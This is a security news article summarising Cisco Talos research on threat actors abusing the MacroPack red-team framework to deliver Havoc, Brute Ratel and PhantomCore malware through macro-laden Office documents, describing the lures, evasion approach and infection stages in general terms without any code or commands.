Recent revelations from Cisco Talos suggest that cybercriminals are leveraging a tool originally crafted for red team operations to propagate malware.
This tool, known as MacroPack, is a sophisticated framework for generating payloads, including Office documents, Visual Basic scripts, Windows shortcuts, and additional formats designed for penetration testing and social engineering trials. French developer Emeric Nasi is credited with its creation.
Talos has identified various artifacts on VirusTotal, originating from China, Pakistan, Russia, and the United States, all generated by MacroPack. These artifacts were used to deploy several payloads, including Havoc, Brute Ratel, and a novel variant of PhantomCore—a remote access trojan (RAT) associated with the hacktivist collective Head Mare.
According to Vanja Svajcer, a researcher at Talos, “A noteworthy element across all the nefarious documents we analyzed was the presence of four benign VBA subroutines. These subroutines were universally found in the samples, unaltered and unmasked, marking a departure from previously utilized malicious subroutines or similar components elsewhere.”
A significant observation is the diverse thematic approach employed in these documents. They range from innocuous prompts urging users to activate macros to seemingly authentic documents masquerading as communications from military entities. This variation implies the presence of multiple threat actors.
Moreover, some of the documents exploit advanced MacroPack functionalities to outwit anti-malware heuristic detection. They achieve this by employing Markov chains to generate ostensibly coherent functions and variable names that obscure the malicious intent.
The attack sequences, tracked from May to July 2024, adhere to a tripartite process. This involves dispatching a malicious Office document embedded with MacroPack VBA code, which subsequently decodes a secondary payload to eventually download and execute the final malware.
This development underscores a trend where adversaries continuously refine their strategies in response to disruptions, adopting increasingly sophisticated methodologies for code execution.